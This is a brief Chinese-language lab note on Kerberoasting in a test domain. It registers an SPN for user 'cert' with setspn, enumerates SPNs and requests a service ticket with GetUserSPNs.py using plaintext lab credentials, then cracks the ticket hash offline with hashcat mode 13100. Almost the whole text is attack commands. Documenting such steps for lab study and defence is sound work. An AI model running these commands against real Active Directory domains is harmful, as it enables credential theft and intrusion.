记录一下大概的步骤
1 在域控上给cert用注册SPN
setspn -U -S sqlserver/win.hacktest.com:1433/MSSQL cert
查询
setspn -L cert
注册SPN
2 利用
查询SPN
python3.9 GetUserSPNs.py hacktest.com/cert:Admin123456. -dc-ip 10.211.55.3
请求服务票据
python3.9 GetUserSPNs.py hacktest.com/cert:Admin123456. -dc-ip 10.211.55.3 -request-user cert
尝试破解
将上面的内容保存成1.txt,使用hashcat破解
hashcat -m 13100 1.txt pass.txt --force